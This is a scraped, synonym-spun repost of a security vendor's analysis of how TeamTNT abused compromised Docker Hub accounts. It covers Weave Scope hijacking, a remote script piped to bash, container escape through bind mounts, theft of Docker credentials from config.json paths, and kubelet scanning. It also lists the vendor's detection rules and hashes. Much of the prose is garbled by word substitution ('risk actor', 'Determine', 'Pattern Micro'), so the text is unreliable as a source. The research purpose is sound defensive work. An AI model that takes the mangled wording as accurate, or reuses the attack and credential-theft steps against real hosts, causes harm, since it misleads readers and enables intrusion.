Cyber Security

Analyzing How TeamTNT Used Compromised Docker Hub Accounts

December 1, 2021

110

[ad_1]

Analyzing How TeamTNT Used Compromised Docker Hub Accounts

Cloud

Following our earlier disclosure of compromised Docker hub accounts delivering cryptocurrency miners, we analyze these accounts and uncover extra malicious actions that you just want to pay attention to.
By: Nitesh Surana

December 01, 2021

Learn time: ( phrases)

In early November, we disclosed that compromised Docker Hub accounts had been getting used for cryptocurrency mining and that these actions had been tied to the TeamTNT risk actor. Whereas these accounts have now been eliminated, we had been nonetheless capable of examine TeamTNT’s actions in reference to these compromised accounts.
Along with the habits we famous earlier, we recognized a number of different actions that the identical risk actor carried out in numerous venues. One was the usage of Weave Scope, a official device by Weaveworks used to watch/management deployed containers.
Weave ScopeWeave Scope is a visualization and monitoring device for Docker and Kubernetes. System directors can use this to watch and management their deployed containers/pods/workloads.

Determine 1. Weave Scope window

One can handle operating containers by executing, rebooting, pausing, stopping and even deleting containers, all of which will be managed from an online console (both native or within the cloud).
On this assault state of affairs, the compromised underlying host was made a node of the risk actor-controlled Weave Scope Cloud occasion, from the place they may execute numerous instructions.

Determine 2. Terminal command executed through Weave Scope

The administration options make Weave Scope an fascinating goal. That is how attackers focused this just lately:
1. The attacker spins up a brand new privileged container based mostly on a picture from a compromised account. Within the arguments, the attacker makes an attempt to mount the basis file system of the underlying host to the ‘/host’ mount level and executes a bash script fetched from the attacker’s infrastructure.

Figures 3-5. Code to spin up new container

2. The script ‘scope2.sh’ is downloaded and piped to ‘bash’ to be executed. The script initially checks if the hostname’s worth is ‘HaXXoRsMoPPeD’ halting the execution if true. This seems like a flag to test if a system has already been compromised.

Determine 6. Script checking for hostname

3. Surroundings variables are set, which overrides localization settings, prevents command historical past logging, and exports a brand new path.
4. A variable ‘SCOPE_TOKEN’ is populated from a managed endpoint, which incorporates the Weave Scope service token. ‘SCOPESHFILE’ incorporates the Weave Scope script, which is encoded in base64.

Determine 7. Encoded script

5. The trail to ‘docker’ binary is fetched utilizing ‘sort docker’. To evade any TTY occasions, they’re redirected to ‘/dev/null’. Based mostly on this, the execution proceeds.
6. The file ‘/tmp/.ws’ is checked:
a. If the file doesn’t exist, the next instructions are executed:
i. The ‘/tmp/’ path is remounted with read-write permissions utilizing the ‘mount’ utility.
ii. The base64 encoded string of the ‘SCOPESHFILE’ variable is decoded and the output is redirected to ‘/tmp/.ws’. That is the Weaveworks’ script and is hidden by default for the reason that file title begins with a ‘.
iii. The permissions of the newly created script are modified to executable utilizing ‘chmod’
b. If the file ‘/tmp/.ws’ exists, then execution proceeds as follows:
i. The ‘/tmp/’ path is remounted as read-write utilizing ‘mount’ utility.
ii. The Weaveworks utility Weave Scope at /tmp/.ws is stopped and launched with the service token fetched on step 4.

Determine 8. Cease and relaunch of Weave Scope utility

Weaveworks revealed a weblog put up in September 2020 that shared greatest practices for securing Weave Scope. Sadly, the abuse of this official device remains to be fairly prevalent.
Pattern Micro Options
Cloud One Workload Safety™
When a brand new container is created over Docker daemon’s REST API, the rule ‘1010326 – Recognized Docker Daemon Distant API Name’ triggers with totally different notes for various steps of the container creation from picture.
Occasions are generated when the ‘containerd’ course of is created and are logged utilizing the Integrity Monitoring module:

Determine 9: Alert for containerd course of

When the Docker Daemon is noticed listening on TCP port, the Log Inspection module detects this as seen under:

Determine 10. Outcomes of Log Inspection module

The AntiMalware Module detects the malicious script ‘scope2.sh’ as a Trojan:

Determine 11. Detection of malicious script

Intrusion Prevention

1010326 – Recognized Docker Daemon Distant API Name
1010561 – Recognized Kubernetes Unprotected Major Channel Data Disclosure
1010762 – Recognized Kubernetes API Server LoadBalancer Standing Patch Request
1010769 – Recognized Kubernetes Namespace API Requests
1009493 – Kubernetes Dashboard Authentication Bypass Data Disclosure Vulnerability (CVE-2018-18264)
1009450 – Kubernetes API Proxy Request Dealing with Privilege Escalation Vulnerability (CVE-2018-1002105)
1009561 – Kubernetes API Server Denial of Service Vulnerability (CVE-2019-1002100)

Log Inspection

1009105 – Kubernetes
1008619 – Software – Docker
1010349 – Docker Daemon Distant API Calls

Integrity Monitoring

1008271 – Software – Docker
1009060 – Software – Kubernetes Cluster grasp
1009434 – Software – Kubernetes Cluster node

Cloud One Community Safety™
The next guidelines are triggered by this assault in Community Safety:

29993: HTTP: Docker Container With Root Listing Mounted with Write Permission Creation Try
33719: HTTP: Docker Daemon “create/exec” API with “Cmd” Key Set to Execute Shell Instructions
33905: HTTP: Kubernetes API Proxy Request Dealing with Privilege Escalation Vulnerability
34487: HTTP: Kubernetes Dashboard Authentication Bypass Vulnerability
34488: HTTPS: Kubernetes Dashboard Authentication Bypass Vulnerability
34668: HTTP: Docker Construct Picture API Request with distant and networkmode Parameters Set
34796: HTTP: Docker Model API Verify Request
35799: HTTP: Kubernetes Overlength json-patch Request
38836: HTTP: Kubernetes API Namespaces Request
38837: HTTP: Kubernetes API Namespaces Standing Request
38838: HTTP: Kubernetes API Create Namespace Request
38839: HTTP: Kubernetes API Delete Namespace Request
38840: HTTP: Kubernetes API Replace Namespace Request
38847: HTTP: Kubernetes API Server loadBalancer Standing Patch Request
38892: HTTP: Kubernetes API Admission Management Create Mutating Webhook Request
38893: HTTP: Kubernetes API Admission Management Create Validating Webhook Request
38896: HTTP: Kubernetes API Admission Management Assets Request
38898: HTTP: Kubernetes API Admission Management Listing Mutating Webhook Configurations Request
38899: HTTP: Kubernetes API Admission Management Listing Validating Webhook Configurations Request
38901: HTTP: Kubernetes API Admission Management Delete Validating Webhook Request
38902: HTTP: Kubernetes API Admission Management Delete Mutating Webhook Request
38903: HTTP: Kubernetes API Admission Management Replace Validating Webhook Request
38904: HTTP: Kubernetes API Admission Management Replace Mutating Webhook Request
38905: HTTP: Kubernetes API Admission Management Learn Mutating Webhook Request
38906: HTTP: Kubernetes API Admission Management Learn Validating Webhook Request
38907: HTTP: Kubernetes API Admission Management Substitute Mutating Webhook Request
38908: HTTP: Kubernetes API Admission Management Substitute Validating Webhook Request
38909: HTTP: Kubernetes API CustomResourceDefinition Assets Request
38910: HTTP: Kubernetes API Create CustomResourceDefinition Request
38916: HTTP: Kubernetes API Listing CustomResourceDefinition Assets Request
38917: HTTP: Kubernetes API Replace CustomResourceDefinition Assets Request
38918: HTTP: Kubernetes API Replace Standing CustomResourceDefinition Assets Request
38919: HTTP: Kubernetes API Learn CustomResourceDefinition Assets Request

Pattern Micro Imaginative and prescient One™

Determine 12. Detection Mannequin for Weave Scope abuse

Since Weave Scope is a official device utilized in workloads, one can allow or disable the XDR Mannequin from Detection Mannequin Administration by toggling the ‘Standing’. If the device shouldn’t be supposed for use within the setting and there are alerts as XDR Mannequin triggers or Noticed Assault Strategies, it should be checked.
Workbench

Determine 13. Workbench diagram

The diagram in Determine 13 demonstrates the facility of correlation amongst totally different Cloud One™ modules, composed right into a single display screen. The left panel reveals the sequence of noticed assault strategies with the occasions generated from Cloud One™ modules, whereas the fitting panel particulars the varied objects concerned on this try. The corresponding MITRE ATT&CK tags assist establish the components of the framework being abused.

Determine 14. Workbench diagram

This Workbench reveals all of the workloads utilizing the Impression Scope within the group the place the unencrypted Docker REST API is uncovered and on which it’s listening.
Root Trigger Evaluation

Determine 15 and 16. Root trigger evaluation diagrams

Within the RCAs generated from the Noticed Assault Strategies, we will deep dive into the varied fields of significance, equivalent to the precise time at which the outbound connection was noticed and the method lineage with the method command line. This reveals that ‘nsenter’ is being executed from ‘scope’, it’s getting used to create a ‘bash’ shell, and the context is fetched from the PID 1 or ‘init’ course of accountable for beginning and shutting down the system.
Escaping from a compromised container
Based mostly on our analysis, the attackers additionally used a widely known approach to flee from a compromised container to the host. They did this through the use of bind mounts and fetching the Docker Hub credentials from the next paths:

/root/.docker/config.json
/dwelling/*/.docker/config.json

As per Docker’s official documentation:
“You may log into any public or non-public repository for which you’ve got credentials. If you log in, the command shops credentials in $HOME/.docker/config.json on Linux or %USERPROFILE%/.docker/config.json”.
When somebody logs into their Docker Hub account utilizing the Docker command line and there are not any credential shops specified, the username, password and registry server hyperlink are populated as a JSON that appears like this:

Determine 17. Code with Docker login

By default, the registry used is of Docker Inc. The worth of ‘auths.auth’ subject is the base64-encoded string that incorporates the credentials within the format ‘username:password’. If these credentials are compromised, one can achieve entry to the victims’ data:

E mail ID used to create the account
Personal Pictures
Entry tokens
Slack Webhooks
Content material Subscriptions
Upgraded options

Now we have a look into how the enumeration of uncovered kubelets was carried out.
Enumeration Of Uncovered Kubelets
This assault abused the Docker REST API to create a container from a picture that had a script on the filesystem path ‘/root/init.sh’, which incorporates the next:
1. They initially replace the alpine-based container and add the packages they want in later operations, like compiling zgrab from supply, utilizing masscan, and so on.

Determine 18. Constructing zgrab

2. As soon as the above steps are executed, they start the execution of their malicious operate utilizing a kill swap, which relies on the contents of a sure endpoint on the attacker’s infrastructure to be equal to ‘RUN’.

Determine 19. Executing malicious capabilities

3. As soon as the kill swap is confirmed to be equal to ‘RUN’, the malicious PWN operate is executed.

Determine 20: Checking for the kill swap

This script fetches a scan vary from a malicious server endpoint. If the outcomes fetched include ‘ENDE’, that indicators the exit of the malicious script.
The outcomes returned by the endpoint is saved within the variable ‘SCAN_RANGE’, which is later appended to ‘.0.0.0/8’. For instance, if the worth returned from the endpoint is 10, then the worth of ‘SCAN_RANGE’ shall be ‘10.0.0.0/8’
The variable ‘rndstr’ is a six-letter random alphabetical string that accumulates a listing of IP addresses of operating pods with the kubelet API TCP port 10250 uncovered which have been discovered utilizing masscan and zgrab. As soon as this subnet is accomplished, the outcomes are despatched again to the risk actor utilizing a for loop, which iterates over the outcomes acquired through a web site.
As soon as the outcomes are despatched, the kill swap loop loops again for a brand new subnet from the infrastructure except all of the subnets are enumerated.
The risk actor appears to do that as preparation to later goal uncovered kubelets. Earlier, we detailed in regards to the shift in focus from Docker REST API to Kubernetes API. Right here’s a development of uncovered Kubernetes API port 10250 listed by Shodan from roughly 1,200 uncovered workloads, months in the past:

Determine 21. Progress in uncovered port 10250

Pattern Micro Options
Cloud One Workload Safety™
Intrusion Prevention

Log Inspection

1009105 – Kubernetes
1008619 – Software – Docker
1010349 – Docker Daemon Distant API Calls

Integrity Monitoring

1008271 – Software – Docker
1009060 – Software – Kubernetes Cluster grasp
1009434 – Software – Kubernetes Cluster node

Cloud One Community Safety™C

Conclusion
Vulnerabilities posed by poor safety misconfigurations or inherent software program bugs are tough to guard. Within the above case, we noticed the usage of official platforms like Weaveworks. To remain protected, we have to rethink about inculcating safety in our each day work by common patching, staying up to date and alerted with the newest happenings in our on-line world.
Pattern Micro™ Cloud One™ – Workload Safety equips defenders and analysts with the flexibility to guard programs towards vulnerabilities, exploits, and malware, providing safety from on-premise to cloud workloads. Digital patching can shield important programs even earlier than the official patches are made accessible.
Pattern Micro™ Imaginative and prescient One™ offers a transparent view of a very powerful occasions as alerts in a concise method, as a result of the race is about fast response. With XDR capabilities with telemetries out of your multi-cloud environments or on-premise workloads, safety groups get a transparent and vivid understanding of what to prioritize.
Indicators Of Compromise
IP handle

Area

Shell scripts

Hash
Detection Title
7c110dc507ed4e2694500c7c37fe9176e9f4db23bc4753c0bfc9f3479eb6385a
Trojan.SH.MALXMR.UWELG
b7cef848b61cfb7d667e60ade3a1781def69f5395b5ad6a2a16f7b7fa11ef1db
Trojan.Win32.FRS.VSNW0CK21

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Analyzing How TeamTNT Used Compromised Docker Hub Accounts

ABOUT US

POPULAR POSTS

Samsung Galaxy Chromebook Plus evaluation: A light-weight Chromebook with just a little further

This Calendar Options Photographs of ‘Canine Pooping in Stunning Locations’

Finest Gaming PC Instances for 2024: Customized Instances for Final Efficiency

POPULAR CATEGORY